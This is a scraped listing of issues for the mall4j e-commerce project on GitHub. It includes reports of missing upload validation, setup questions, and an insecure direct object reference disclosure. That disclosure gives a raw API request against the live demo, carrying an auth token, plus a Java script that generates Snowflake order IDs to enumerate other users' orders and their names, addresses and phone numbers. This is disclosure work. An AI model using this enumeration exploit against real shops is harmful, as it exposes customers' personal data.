gz-yami / mall4j Goto Github PK
View Code? Open in Web Editor NEW⭐️⭐️⭐️ 电商商城 小程序电商商城系统 PC商城 H5商城 APP商城 Java商城 O2O商城 跨境商城
Home Page: https://www.mall4j.com
License: GNU Affero General Public License v3.0
⭐️⭐️⭐️ 电商商城 小程序电商商城系统 PC商城 H5商城 APP商城 Java商城 O2O商城 跨境商城
Home Page: https://www.mall4j.com
License: GNU Affero General Public License v3.0
Lack proper validation for uploaded image files in the backend.
While there is validation in the frontend component "index.vue," it is crucial to perform server-side validation as well. This vulnerability allows attackers to upload files of any type and size, potentially leading to XSS attacks or resource exhaustion, which can result in DDoS attacks.
Two interfaces are affected:
com.yami.shop.admin.controller.FileController.uploadElementFile
com.yami.shop.admin.controller.FileController.uploadTinymceEditorImages
It is recommended to implement server-side validation for uploaded image files in String com.yami.shop.service.impl.AttachFileServiceImpl.uploadFile(MultipartFile file)
. This includes checking the file size and verifying that the file type is allowed (e.g., image/jpeg, image/png). By implementing these validations in the backend, you can prevent the upload of malicious files, mitigate the risk of XSS attacks, and prevent resource consumption that could lead to DDoS attacks.
可以增加客服IM吗
你好 库里能看到的这个版本的开源代码 是可以免费商用的吗
似乎跟码云上的代码没同步,有几个空的方法没有实现。
商品 类目 品牌的表设计是不是有问题 而且有些表没数据
After the user logged in, send the following data:
GET /p/order/getOrderPayInfoByOrderNumber?orderNumbers=1585796527123730432 HTTP/2 Host: b2b2c-api.mall4j.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: application/json, text/plain, */* Accept-Language: zh Accept-Encoding: gzip, deflate Authorization: iqype7HZzm8WwlUnYTIRmXVBsfZ2Udqs+7wO+RAQLOB61CG1vjV6U+sArYkZPG8Q Origin: https://pc.mall4j.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers Connection: close
The user can input others orderNumbers to gain other Privacy Information including address,name,phonenumber and so on.
I write a script can get orderNumbers,attacker can get order's information that was created in any day.
Script:
`
import cn.hutool.core.date.SystemClock;
import cn.hutool.core.util.IdUtil;
import cn.hutool.core.util.StrUtil;
import java.io.*;
import java.util.Date;
public class test implements Serializable {
public static void main(String[] args) throws IOException {
FileWriter f = new FileWriter("/mall4j-master/1.txt");
FileOutputStream out = null;
for (long i = 1666884749000l; i <= 1666884750000l; i++) {
for (long j = 31l; j <= 31l; j++) {
test test1 = new test(1,1);
// out = new FileOutputStream(new File("/Users/zhangchenxu/安全/代码审计靶场/mall4j-master/1.txt"));
String str = String.valueOf(test1.nextId(i));
System.out.println(str);
f.write(str + "\n");
}
}
// System.out.println(test1.nextId(1666885538000l));
f.close();
}
private static final long serialVersionUID = 1L;
public static long DEFAULT_TWEPOCH = 1288834974657L;
public static long DEFAULT_TIME_OFFSET = 2000L;
private static final long WORKER_ID_BITS = 5L;
private static final long MAX_WORKER_ID = -1L ^ (-1L << WORKER_ID_BITS);
private static final long DATA_CENTER_ID_BITS = 5L;
private static final long MAX_DATA_CENTER_ID = -1L ^ (-1L << DATA_CENTER_ID_BITS);
private static final long SEQUENCE_BITS = 12L;
private static final long WORKER_ID_SHIFT = SEQUENCE_BITS;
private static final long DATA_CENTER_ID_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS;
private static final long TIMESTAMP_LEFT_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS + DATA_CENTER_ID_BITS;
private static final long SEQUENCE_MASK = ~(-1L << SEQUENCE_BITS);// 4095
private long twepoch;
private long workerId;
private long dataCenterId;
private boolean useSystemClock;
private long timeOffset;
private long sequence = 0L;
private long lastTimestamp = -1L;
public test() {
this(IdUtil.getWorkerId(IdUtil.getDataCenterId(MAX_DATA_CENTER_ID), MAX_WORKER_ID));
}
public test(long workerId) {
this(workerId, IdUtil.getDataCenterId(MAX_DATA_CENTER_ID));
}
public test(long workerId, long dataCenterId) {
this(workerId, dataCenterId, false);
}
public test(long workerId, long dataCenterId, boolean isUseSystemClock) {
this(null, workerId, dataCenterId, isUseSystemClock);
}
public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock) {
this(epochDate, workerId, dataCenterId, isUseSystemClock, DEFAULT_TIME_OFFSET);
}
public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock, long timeOffset) {
if (null != epochDate) {
this.twepoch = epochDate.getTime();
System.out.println("null != epochDate");
} else{
// Thu, 04 Nov 2010 01:42:54 GMT
this.twepoch = DEFAULT_TWEPOCH;
}
if (workerId > MAX_WORKER_ID || workerId < 0) {
throw new IllegalArgumentException(StrUtil.format("worker Id can't be greater than {} or less than 0", MAX_WORKER_ID));
}
if (dataCenterId > MAX_DATA_CENTER_ID || dataCenterId < 0) {
throw new IllegalArgumentException(StrUtil.format("datacenter Id can't be greater than {} or less than 0", MAX_DATA_CENTER_ID));
}
this.workerId = workerId;
this.dataCenterId = dataCenterId;
this.useSystemClock = isUseSystemClock;
this.timeOffset = timeOffset;
}
public long getWorkerId(long id) {
return id >> WORKER_ID_SHIFT & ~(-1L << WORKER_ID_BITS);
}
public long getDataCenterId(long id) {
return id >> DATA_CENTER_ID_SHIFT & ~(-1L << DATA_CENTER_ID_BITS);
}
public long getGenerateDateTime(long id) {
return (id >> TIMESTAMP_LEFT_SHIFT & ~(-1L << 41L)) + twepoch;
}
public synchronized long nextId(long time0) {
long timestamp = time0;
if (timestamp < this.lastTimestamp) {
if(this.lastTimestamp - timestamp < timeOffset){
// 容忍指定的回拨,避免NTP校时造成的异常
timestamp = lastTimestamp;
} else{
// 如果服务器时间有问题(时钟后退) 报错。
throw new IllegalStateException(StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
}
}
if (timestamp == this.lastTimestamp) {
final long sequence = (this.sequence + 1) & SEQUENCE_MASK;
if (sequence == 0) {
timestamp = tilNextMillis(lastTimestamp,time0);
}
this.sequence = sequence;
} else {
sequence = 0L;
}
lastTimestamp = timestamp;
long result = ((timestamp - twepoch) << TIMESTAMP_LEFT_SHIFT)
| (dataCenterId << DATA_CENTER_ID_SHIFT)
| (workerId << WORKER_ID_SHIFT)
| sequence;
return result;
}
public String nextIdStr() {
// return Long.toString(nextId());
return null;
}
// ------------------------------------------------------------------------------------------------------------------------------------ Private method start
private long tilNextMillis(long lastTimestamp,long time0) {
long timestamp = time0;
while (timestamp == lastTimestamp) {
timestamp = time0;
}
if (timestamp < lastTimestamp) {
// 如果发现新的时间戳比上次记录的时间戳数值小,说明操作系统时间发生了倒退,报错
throw new IllegalStateException(
StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
}
return timestamp;
}
private long genTime() {
return this.useSystemClock ? SystemClock.now() : System.currentTimeMillis();
}
// ------------------------------------------------------------------------------------------------------------------------------------ Private method end
}
`
我贴个重要日志, node-sass安装失败。百度说是要py3的支持?
gyp ERR! stack Error: Can't find Python executable "python", you can set the PYTHON env variable.
gyp ERR! cwd C:\Users\yikong\Desktop\mall4v-master\node_modules\node-sass
gyp ERR! node -v v14.15.4
gyp ERR! node-gyp -v v3.8.0
gyp ERR! not ok
npm ERR! [email protected] postinstall: `node scripts/build.js`
npm ERR! Exit status 1
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.